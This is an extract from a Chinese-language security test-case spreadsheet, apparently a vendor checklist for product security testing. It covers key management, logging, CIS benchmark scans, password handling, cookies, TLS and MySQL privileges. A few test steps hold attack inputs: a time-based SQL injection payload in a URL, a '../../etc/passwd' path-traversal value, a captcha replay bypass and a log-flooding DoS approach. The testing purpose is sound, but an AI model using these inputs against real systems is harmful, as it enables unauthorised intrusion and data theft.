    <t>密码安全是基于密钥安全的， 如果密钥不可更新，攻击者可以在收集足够的“明密文对”后使用成熟的密码分析技术大大降低猜测密钥的难度，最终获取密钥，解密密文。
检查密钥更新是否符合以下要求：
1、工作密钥禁止硬编码，硬编码在可执行程序里的密钥无法更新（版本更新不视为密钥更新的方法）
2、系统设计和功能里设计和支持了密钥更新方法（密钥更新方式：手动更新、自动更新等），并规定了密钥更新规则（在线更新、离线更新、更新时间等）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.使用shell脚本和工具检查代码中密钥敏感字符串（key、sharekey、encrypt、enc、dec、decrypt等），并结合开发人员人工访谈&amp;分析，确认初始密钥是否使用工具生成。
2.根据场景分析可能会用到加密密钥的模块，重点走读这部分代码，检查是否存在硬编码密钥。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>密钥明文保存在本地，攻击者可以轻易的获取密钥并使用密钥解密密文，数据的机密性无法保证，整个加密机制将完全失效；敏感信息明文保存在本地，攻击者可以轻易的获取敏感信息，造成敏感信息泄露。
检查密钥的存储是否符合以下要求：
1、密钥不允许明文保存在本地
2、密钥材料及密钥组件在本地保存时有严格控制其权限</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>密钥即相关信息在存储时被恶意篡改，将导致解密出的数据错误，如果应用系统使用错误的解密结果或被篡改的敏感数据进行数据处理，将可能使程序进入不可预期的运行状态，损害应用程序的正常运行。
检查项（本检查项为规范建议，产品可根据实际业务场景或客户需求分析是否符合要求）：
1、密钥在本地加密时是否进行MAC校验或数字签名
2、密钥材料和密钥组件在本地存储时是否进行MAC校验或数字签名</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>要求一、检查通道或者加密方式是否安全
1、按照加密算法规范的要求，检查通道是否走TLS的安全加密通道加密；
2、按照加密算法规范的要求，对于密码不可逆的场景检查是否采用Sha256等公司规定的安全Hash算法进行加密，并加了安全盐值；
3、对于加密算法可逆的场景，检查是否采用的AES256等公司规定的安全可逆算法加密，密钥是否安全保存；
要求二、检查是否存在弱加密算法套和弱加密函数
方法一：
1、使用Nessus扫描工具对系统进行扫描，看是否有弱加密算法的使用。
方法二：
2、查看产品相关文档，查找涉及敏感信息的特性说明。
3、检查敏感信息在产品中的加密方式是否符合要求。
方法三：
4、在源码中搜索相关加密函数，查看相应加密方式的使用是否合理。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、系统提供日志记录功能
2、系统运行正常</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、检查产品说明文档，查看系统提供的日志功能是否记录管理面所有的用户活动和操作。
2、检查系统日志记录的级别，查看是否仅记录高级别的事件而没有记录登进登出等相关的日志。
3、尝试使用系统相关管理功能：用户登陆、信息修改、删除信息、上传下载等，之后查看系统日志，看是否对相关操作有记录。
4、查看系统日志信息，看记录是否完善，能否支撑审计工作。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>在需要抗抵赖的场景，系统必须清晰的定义哪些操作是需要审计的，并明确日志级别。
  所有个人访问系统组件的操作日志,但日志中不包含卡数据
  记录具有根权限或管理权限的任何个人实施的操作日志
  记录所有日志审计相关的访问操作
  记录无效的逻辑访问尝试
  记录系统级对象的创建和删除</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.启动SecureCAT(V1.1.4)
【选择新标准(推荐)：
2.在SecureCAT工具的启动界面上，“Select Benchmark”(标准选择框)中做如下选择：
“Benchmark Category”（标准类别）选择："system"；下拉框中选择"Linux&amp;Unix"。“BenchMarks”（标准）下拉框中选择"CIS_SUSE_Linux_Enterprise_Server_11_Benchmark_v1.0.0"。点击右下角按钮“Next”。
3.在“Select Profile”(框架选择框)中做如下选择：“Profile(s)”（框架）中推荐选择"Level2 Enhanced Security"。点击按钮“Profile Edit”，核对所有选择的检查项，推荐全选（如项目有特殊要求，可根据需要去掉个别检查项）。点击右下角按钮“Next”。
选择旧标准(可选)：
2.在SecureCAT工具的启动界面上，“Select Benchmark”(标准选择框)中做如下选择：
“Benchmark Category”（标准类别）选择："system"；下拉框中选择"Linux&amp;Unix"。“BenchMarks”（标准）下拉框中选择"CIS_SUSE_Linux_10-11_Benchmark_v2.0"。点击右下角按钮“Next”。
3.在“Select Profile”(框架选择框)中做如下选择：“Profile(s)”（框架）中选择"Default Policy"。点击按钮“Profile Edit”，核对所有选择的检查项，推荐全选（如项目有特殊要求，可根据需要去掉个别检查项）。点击右下角按钮“Next”。
】
4.(以下参数全部根据项目实际情况填写)在“Set Parameters”（设置参数框）中，进行如下设置：“SSH_Host”填入目标系统的IP地址；“SSH_Port”填入目标系统的SSH服务端口；“SSH_UserName”填入登陆目标系统的SSH账户名（最好不是root账户）；“SSH_Password”填入“SSH_UserName”用户名所对应的登陆口令；“ROOT_Alias”填入root账号别名（也可为root）；“SU_Command”填入低级别账户切换到高级账户所使用的切换命令，一般为su或sudo，如su - root；“SU_Password”填入“SU_Command”中输入的账号所对应的口令。点击按钮“Test Connection”,测试连接情况，如果显示“Test Successful”（连接成功），则可点击右下角按钮“Next”进入下一步。（如果测试连接情况显示失败，则请检查网络连接和配置。）
5.“Review Assessment Setting”中检查以上配置的基本信息，检查无误后点击右下角按钮“Assessment”,开始正式评估系统安全。
6.评估完成后，界面右下角会出现“Results”按钮，点击它可以查看各种格式的报告。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.登陆被测系统，进入命令行模式
2.执行如下命令检查相关接口是否为活动状态：
# ifconfig -a 
验证是否所有业务不使用的接口（包括无线接口）都是down状态。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.登陆被测系统，进入命令行模式
2、执行命令：cd \etc\sysconfig\network进入相应目录
3、当前目录下执行：vi ifcfg-eth0（有可能是其他名字，一个网卡对应一个配置文件）
4、查看字段 BOOTPROTO 的值是否为：static
（遍历每个网卡配置文件）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.输入口令时检查口令是否有明文
2.查看UseSystemPasswordChar属性值是否为true</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.检查操作系统日志，核实安全相关的事件都有明确的日志记录（时间戳、进程号等）
注：
/var/log/目录下的如下文件，存有安全相关的日志信息：
acct/pacct　　　纪录用户命令 
lastlog　　　　 纪录最近几次成功登录的事件和最后一次不成功的登录 
messages　　　　从syslog中记录信息（有的链接到syslog文件） 
syslog　　　　　从syslog中记录信息（通常链接到messages文件） 
wtmp　　　　　　一个用户每次登录进入和退出时间的永久纪录 
utmp　　　　　　纪录当前登录的每个用户(该文件在/var/run目录下)</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>方法1(如果被测系统联网)：
1.登陆被测系统，进入命令行模式
2.运行如下命令：# zypper list-updates检查是否有更新
方法2：
1.通过最新版本的Nessus工具扫描系统，检查是否有遗漏的补丁</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.登录Web后台服务器；
2.进入Web部署目录，检查目录中否存在敏感文件（如日志文件、配置文件、数据库文件等）
find ./ -name "*log*"
find ./ -name "*config*"
find ./ -name "*jdbc*"
find ./ -name "*conn*"
备注：根据产品习惯定制。Web内容目录是存放可访问页面的目录。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.Web服务运行正常
2.拥有Web服务器操作系统的帐号和口令
3.已知Web容器的部署，配置目录</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.访问登录/认证界面，输入正确的帐号错误的密码提交；
2.WEB代理工具记录拦截的登录表单内容；
3.错误访问多次之后，登录/认证界面弹出验证码；
4.使用WEB代理工具拦截，并将内容替换成步骤2中记录下来的表单内容，修改错误的密码为正确的密码，并提交。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.通过访谈获取开发常用账号定义关键字，收集产品常用账号；
2.打开Search and Replace，使用收集到的关键字搜索代码；
3.常用关键字搜索代码（包括但不限于以下常用关键字）如下：
(username|usrid|user|uid|ftp|ftpuser|super|superuser|root|name|loginname|login|ftpid)
(101|fixation|system|sys|super|support|master|imapuser|verfiycode|authenticationcode|sharekey|sharecode|key|ftppasswd|ftppass|ftppassword|passcode|manager|privilege|sysadmin| administrator|admin)
4.分析搜索结果是否有写死的账号
注意：请根据产品实际情况或者访谈开发人员结果添加关键字，建议不要删减。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.登录系统；
2.检查界面是否有明显的“注销（或退出）”的按钮或菜单。（如果是命令行界面，检查是否提供“注销/退出”的命令）。
注：如不存在该功能，在关闭浏览器时，会话可能仍然可用，导致会话被冒用。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>pass</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>方法一：
1.登录系统；
2.使用Web代理工具捕获响应消息，查看Set-Cookie响应头的Secure属性。当Cookie包含敏感信息或者Cookie是会话令牌时，应该始终使用加密方式发送。例如，登录系统后，使用Cookie设置会话令牌，需要验证是否设置Secure属性。如果没有设置，说明存在问题。
3.查看Set-Cookie响应的HttpOnly属性：HttpOnly属性能防止客户端脚本使用该Cookie，以加强Cookie的安全。如果没有设置，说明存在问题。
方法二：
利用Appscan对Web应用进行扫描，如果存在Secure、HttpOnly安全属性漏洞，扫描报告也会列出该漏洞。
注：方法二存在误报，请使用方法一对该误报进行解释说明。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.以用户A的身份登录系统，记录用户A的私有URL数据
2.注销A，以用户B登录；
3.查看用户B是否可以正常访问A的URL，如果正常访问，B用户可以查看A用户的敏感信息，说明存在问题。
备注：在添加、删除等模块中也可以通过修改用户身份ID或者会话ID，来尝试是否存在用户横向越权访问。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.系统正常运行
2.已知系统用户名口令
3.配置完成抓包工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.搜索所有密码，并确认加密算法(或者梳理产品内部模块间-包含B/S、C/S架构，产品模块与DB间、产品与其他网元间的涉及到认证或者登陆的接口)
2.分析密码使用场景：在不需要还原口令的场景，必须使用不可逆算法加密。
注：可还原口令的场景举例：仅用于口令本地加密的场景（配中文件中用于连接数据库的用户口令加密存储）；
   不可还原口令的场景举例：仅用于用户登录时服务器存储的加密的用户口令（服务端加密认证，无其他用途加密算法使用不可逆算法）
   常见的安全的不可逆算法：SHA224/256
   常见的可逆算法：AES DES</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>如果应用程序涉及口令，如登录、口令修改、口令类服务处理过程等，则：
1、启动Wireshark进行嗅探
2、查看Wireshark的嗅探记录，根据传输的源IP及目的IP过滤出相应的记录，右键并点击“Follow TCP Stream”，检查是否能够看到明文口令。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、查看系统默认配置是否打开ssl/tls协议；
2、使用wireshark对通信过程抓包，查看是否真正使用ssl/TLS协议传输数据</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、管理员重置、修改自己的口令，管理重置其他用户口令；
2、（可选）使用交互式命令行参数修改口令时，应对新口令进行确认。
3、旧口令输入错误时，应提示旧口令输入错误，并使该口令修改操作失效。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、Web server必须对访问的请求进行过滤。普通用户禁止通过http访问/web/web/路径下任意文件(日志、配置文件）。
2、通过主控的外置LMT的用户解锁命令构造的URL不能执行解锁。
3、禁止不登录WEB界面即可获取系统配置信息
4、刀片服务器WEB禁止不经认证通过http（非https）协议访问下载conf和xml文件。
5、管理web的所有url必须经过认证，防止泄露关键数据</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、禁止使用C标准库函数random()、rand()生成随机数用于安全用途
2、禁止使用Java的java.util.Random类生成随机数用于安全用途
3、随机数种子的设置只能在进程初始化的时候设置一次，禁止每次调用随机数接口时都设置种子
4、使用java.security.SecureRandom()产生随机数时，禁止每次都设置了相同的种子，这将导致每次启动后产生的随机数都一样（若使用java.security. Secure Random()时出现阻塞，消减方案请参考《熵源不足情况下产生安全随机数的解决方案》（待发布））
5、生成随机数长度应超过24个字符（或192bits）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.服务端是否对客户端的请求进行合法性校验</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、将会话标识符以GET参数进行传递
2、在日志或打印信息中查看会话标识
3、在url中查看会话标识</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、禁止使用自行设计的密码算法或使用未公开算法细节的算法；
2、禁止自行对标准密码算法进行改造并使用；
3、禁止使用自行定义的通过变形/字符移位/替换等方式执行的数据转换；
4、禁止使用编码的方式（如Base64编码）实现数据加密目的；
5、禁止使用差错控制编码（如奇偶校验、CRC）实现完整性校验。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>find ./ -perm +0007 命令返回的结果为空，或者返回的文件或目录的权限是业务必须的。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>产品在GA后，应保证：
1.产品补丁计划中应包含操作系统安全补丁发布计划（Windows至少一年两次，Linux/Unix至少一年一次）。
2.Support网站上发布相应的补丁。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.方法1：请产品SE（安全）先自检，然后测试人员对自检结果进行分析确认。
2.方法2：和LMT负责人访谈，了解产品GA后操作系统安全补丁发布计划，确认是否符合公司要求（Windows至少一年两次，Linux/Unix至少一年一次）；在Support网站上实际检查相应的操作系统安全补丁发布情况。
说明：公司有OS安全补丁研发发布专项工作组，操作系统安全补丁统一的发布渠道：http://hi3ms.huawei.com/hi/group/2288。
3.对于嵌入式操作系统也需做相应的检查。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、通过外部接口无法ping通系统内部接口，使用nmap强制扫描无效。系统采用了有效的隔离手段。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、尝试访问http://www.exmaple.com/robots.txt。
2、观察返回结果。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>block</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.不可以获取到passwd或boot.ini等敏感文件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PC2访问系统内部链接失败。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、使用管理员账号登陆系统。
2、尝试执行重启设备、格式化存储空间等危险操作。
3、看是否提示用户操作的危险性，并要求用户重新输入验证口令。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、Web业务运行正常。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.WEB系统正常运行
2.系统提供不同的应用服务</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统运行正常</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、获取产品资料。
2、产品环境可用。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.遍历web中，寻找是否存在基于标识符功能的页面，即用数字串或者字符串标识某个特定的资源，例如https://wahh-app.com/ViewDocument.php?doaid=1280149120      2.使用其他用户登陆，查看是否可以采用访问该资源                             3 检视代码，结合日志搜索，猜测标示符的生成算法（例如是连续生成的数字），使用猜测的其他标识符查看是否能访问到其他资源文件。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>首先通过任务管理器启动mysql服务，命令行进入mysql安装目录下的bin目录，执行以下命令：
windows：mysql -u用户名 -p密码
linux：./mysql -u用户名 -p密码
1.在mysql命令行下执行“select user from mysql.user where File_priv ='Y';”
2.查询结果应该管理员用户。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>首先通过任务管理器启动mysql服务，命令行进入mysql安装目录下的bin目录，执行以下命令：
windows：mysql -u用户名 -p密码
linux：./mysql -u用户名 -p密码
1.在mysql命令行下执行“select user from mysql.user where Process_priv ='Y';”。
2.查询结果应该管理员用户。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.在linux操作系统中查看mysql可以被哪些ip地址访问，是否是业务需要的最小范围</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.检查msyql的配置文件和命令行参数（windows环境下为my.ini文件，linux环境下为my.cnf文件)，确认是否禁止使用选项--log-update</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>检查产品中SSL连接使用的证书，不能使用默认的证书。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、对设备发起大量连接，并使用各连接反复使用历史会话ID发起重连</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、修改系统时间，使证书正常使用天数小于30天
2、修改系统时间，使当前时间超过证书正常使用时间
3、通过SSL方式连接被测试设备</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1，使用nmap工具扫描ssl端口，观察ssl的版本号，看其是否使用的是tls 1.2以上版本。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、ssl版本号为tls 1.2以上版本。
1.2以上一定安全，1.0-1.1有安全风险</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、检查SSL客户端的默认配置，观察其是否默认需要对服务端进行验证。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、管理口令是否明文存储在数据库、配置文件、日志、cookie、调试跟踪信息中，业务口令须支持加密，并缺省加密。
2、口令不需要还原的场景（第三方及开源暂不要求）是否使用不可逆的加密算法
3、在口令需要还原的场景是否使用AES128-CBC模式
4、盐值是否是固定的字符串（如：用户名等）。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、管理员禁止重置自己的口令，只能修改自己的口令，且修改时需要验证旧口令；管理重置其他用户口令的场景不需要验证口令；
2、（可选）使用交互式命令行参数修改口令。
3、旧口令输入错误时，查看系统响应。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、在登录界面或者修改口令界面中，查看是否明文回显输入的口令
2、使用交互式命令行参数时，查看是否明文回显输入的口令
3、禁止在程序的错误提示信息中明文显示口令
4、禁止在调试信息中明文显示口令
5、禁止使用查看历史命令（如：方向健或history）的方式显示口令</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、口令框内的信息拷出或剪切到其他位置（如：文本文件，网络设备等）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、系统认证时，是否有验证码或错误次数、时间限制
2、当产品使用验证码时，是否先对验证码进行验证，再验证帐号/口令的正确性
3、当重复输入错误口令次数(如3次）超过阈值时，返回的错误信息是否泄露系统敏感信息，</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、Unix/Linux系统的/etc/passwd文件里除了root用户之外，是否存在UID为0的其他账户</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>在存在SQL注入的链接加入WAITFOR DELAY '0:0:5'等尝试注入，如：http://[ip]:8080/DSLKeeper/DSLManager/measure/showAlarmTotal.do?deviceID=&amp;startTime=' WAITFOR DELAY '0:0:5'--&amp;endTime=</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.查看报告分数，不低于70分为通过
2.对于所有的扣分项，产品必须给出未通过的原因及影响分析，直到全部条目的未通过原因得到实验室的核准
备注：
对于SUSE 11：
(1)CIS_SUSE_Linux_10-11_Benchmark_v2.0策略是公司过去一段时间要求的必选策略，主要针对SP1/SP2，但也可覆盖SP3。
(2)CIS_SUSE_Linux_Enterprise_Server_11_Benchmark_v1.0.0策略会是以后公司针对SUSE 11主推的策略,可覆盖SP1-SP3。而且当前SecureCAT的帮助文档中已经明确说明，该策略为“针对Suse11发布的新标准，可替代CIS_SUSE_Linux_10-11_Benchmark_v2.0做红线解读评估标准”
(3)根据以上说明及与SecureCAT开发团队的确认，以上两个标准有一个不低于70分，即可判定本用例通过。不通过的子项，可单独检查。（策略粒度不同，分数有差异）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.启动SecureCAT(V1.1.4)
2.在SecureCAT工具的启动界面上，“Select Benchmark”(标准选择框)中做如下选择：
“Benchmark Category”（标准类别）选择："system"；下拉框中选择"Linux&amp;Unix"。“BenchMarks”（标准）下拉框中选择"CIS_SUSE_Linux_10-11_Benchmark_v2.0"。点击右下角按钮“Next”。
3.在“Select Profile”(框架选择框)中做如下选择：“Profile(s)”（框架）中选择"Default Policy"。点击按钮“Profile Edit”，核对所有选择的检查项，推荐全选（如项目有特殊要求，可根据需要去掉个别检查项）。点击右下角按钮“Next”。
4.(以下参数全部根据项目实际情况填写)在“Set Parameters”（设置参数框）中，进行如下设置：“SSH_Host”填入目标系统的IP地址；“SSH_Port”填入目标系统的SSH服务端口；“SSH_UserName”填入登陆目标系统的SSH账户名（最好不是root账户）；“SSH_Password”填入“SSH_UserName”用户名所对应的登陆口令；“ROOT_Alias”填入root账号别名（也可为root）；“SU_Command”填入低级别账户切换到高级账户所使用的切换命令，一般为su或sudo，如su - root；“SU_Password”填入“SU_Command”中输入的账号所对应的口令。点击按钮“Test Connection”,测试连接情况，如果显示“Test Successful”（连接成功），则可点击右下角按钮“Next”进入下一步。（如果测试连接情况显示失败，则请检查网络连接和配置。）
5.“Review Assessment Setting”中检查以上配置的基本信息，检查无误后点击右下角按钮“Assessment”,开始正式评估系统安全。
6.评估完成后，界面右下角会出现“Results”按钮，点击它可以查看各种格式的报告。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>使用SecureCat工具扫描操作系统，确认检查项
5.1.3 Ensure rsh client is not installed (Scored)是否pass
5.1.4 Ensure rsh server is not enabled (Scored)是否pass
5.1.7 Ensure telnet server is not enabled (Scored)是否pass</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>检查应用程序是否提供认证机制（例如：用户名/口令认证、密钥认证、证书认证、智能卡认证、USB Key认证、动态口令认证、生物特征认证、IP认证等）来保护受限访问的资源。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、如果产品处理、使用了非业务所必需的个人数据，容易引发用户的质疑和投诉，同时也违背了个人数据保护法中的最小限度原则。因此产品应只处理业务所必需的个人数据。对于业务可选的个人数据不处理，或者默认不处理并提供开关控制，在征得最终用户同意并确认后才处理；尽可能选择不需要处理个人数据，又可满足业务需求的替代方案。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.进入系统下载相关功能界面，下载文件
2.使用WEB代理工具拦截请求信息报文，检查下载文件信息参数
3.修改文件信息参数为：../../etc/passwd</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.进入系统
2.查找系统中可以输入较长内容的输入框进行超长度输入，如：Textarea中未限制长度。
3.使用代理工具拦截请求消息，填写超长数据，绕过客户端限制，发送至服务器。
测试思路：这个 DoS 攻击的目标是引起应用程序日志记录有可能充满磁盘的极大容量的数据。这个攻击可能按以下两种方式发生：
1. 测试者在请求中提交极长的值给服务器，同时应用程序不验证它们是否是所期望的而直接记录这个值。
2. 应用程序可能进行数据验证以确定提交值是否按照正确的格式和长度，但之后应用程序同样会将失败的值（为了审查或者追踪错误的目的）记录到应用程序日志中。如果应用程序没有指定可利用的日志或者记录空间的上限，这将是可攻击的一个漏洞。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、查找应用程序修改口令的界面/页面
2、检查是否必须要二次输入新口令
3、新口令和确认口令不同，修改口令
4、新口令和确认口令相同，修改口令</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、应在产品CPI资料中是否提示用户修改出厂时预置的缺省口令。
2、人机帐号使用缺省口令登录时，系统是否提示用户修改缺省口令。
3、管理员重置用户口令（如：找回密码功能）后，用户登录系统时是否被提示修改重置口令
4、如果产品调用开源第三方软件，且开源第三方软件无法实现提示用户修改口令的功能，是否在产品资料里提醒用户更新口令
5、口令是否硬编码在代码里，例如： 
   用于存放口令的变量在定义时被赋予口令（如：const char pwd[]="roygcbp";）
6、系统缺省口令是否硬编码在代码中</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、用户登录失败后，查看服务器响应
2、如果认证失败的返回报文中携带了错误码，错误码应同时代表“用户名或密码错误”的含义；分析错误码。
3、（可选）无论帐号名是否存在，在达到锁定阈值后，是否启动锁定机制</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、登录、登出操作和结果是否有记录日志
2、账户锁定和解锁（含自动）操作和结果是否记录日志
3、对于特殊的用户（如：超级管理员、默认账户等），登录、登出、锁定、解锁操作及结果是否有记录日志</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、低权限用户创建一个新用户，通过新建的用户为自身增加权限
2、新建的管理员增加自身没有的权限</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.新建的帐号是否有默认分配所有服务类型（如http、telnet、ssh、ftp等）
2.如果radius服务器没有返回用户的权限信息，是否系统默认用户为管理员级别以上的权限。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、对于ftp和专用sftp用户，查看、编辑、执行ftp/sftp主目录的上一级目录或上N级目录内的文件、脚本或其他资源，且用户上传或下载文件的大小（可选)、路径是否有校验。
2、专用sftp用户是否有SSH登录权限（将sftp用户的shell改成/bin/false）；
3、上传到服务器的系统文件、配置文件、补丁文件等是否具有可执行权限（如：7XX、77X、777等）。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.系统的文件和目录权限是否参考《身份和访问管理安全设计规范》中规则3.2.1【实施指导】中的表格进行设置
2、普通的ftp用户下载私钥文件
3、一般维护级别的用户从数据库里复制敏感数据到外部机器
4、Unix和类Unix系统用户的umask大小
5、（可选）查看包含敏感信息的文件的文件名
6、是否对存放会话文件的目录进行访问限制,对存放会话信息的数据库表做限制
对于终端产品：
7、检查短信发送接口是否进行权限控制
8、是否对终端功能模块的广播机制进行控制，
9、终端是否暴露了某些可能导致对攻击者进行DOS攻击的接口</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统中保留SSH V1协议的支持</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>检查是否关闭SSH V1协议的支持，可通过undo ssh server compatible-ssh1x命令关闭。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、通过逆向工程或代码审计检查接收用户输入的方法、函数等，写入超长度的内容，观察是否能够造成溢出。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、使用面向连接的协议（SFTP、FTP、TELNET、SSH等）与被测设备建立连接。
2、将控制台闲置一段时间，不进行任何操作。
3、尝试操作控制台，看是否已经超时断链，需要重新建立连接。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.根据产品描述or其他设计文档，梳理产品内部接口/对外接口
2.检查模块间通信以及产品对外通信接口是否有接入认证机制</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>web应用程序采用HTTP访问方式</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.向法务部获取我司隐私政策内容，并依照内容查看收集，处理的用户信息其必要性
2.告之用户收集，处理信息的意图，必要性并获取同意</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.新开发产品通过检查设计文档，查看加解密相关设计是否满足要求。
2.定制/补丁版本由于历史原因造成设计文档不全或者老代码无持续维护潜藏风险通过以下方式：
  a.结合敏感数据加密存储红线条目一起测试：搜索数据库/文件/内存等存储的所有密码、银行账号、密钥等敏感数据，确认其算法，检查是否满足要求。
  b.使用Search and Replace.zip扫描代码中非法算法关键字比如专利算法的：IDEA。
  c.代码飞检。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>分别进行以下操作：
（1）不同用户对系统组件进行访问、操作；
（2）不同权限的用户对系统进行操作；
（3）对日志模块/文件进行操作；
（4）有效/无效的逻辑访问操作；
（5）创建/删除系统对象。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、通过访谈或查看产品资料的日志部分，看产品支持的日志种类和级别。
2、登陆设备，尝试各种涉及系统安全性的操作，例如：新建用户、关闭某些安全检查功能、通过暴力破解使账号锁定等。
3、查看系统日志，看上述操作是否有清晰的日志记录，并确认日志级别是否满足要求（不会因为日志级别低而导致管理员容易忽略）。
4、检查各级别的日志中是否有敏感信息</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.被测目标系统正常运行
2.SecureCAT工具通过正确配置，扫描过系统并生成了报告</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、"步骤4"中的BOOTPROTO值为static</t>
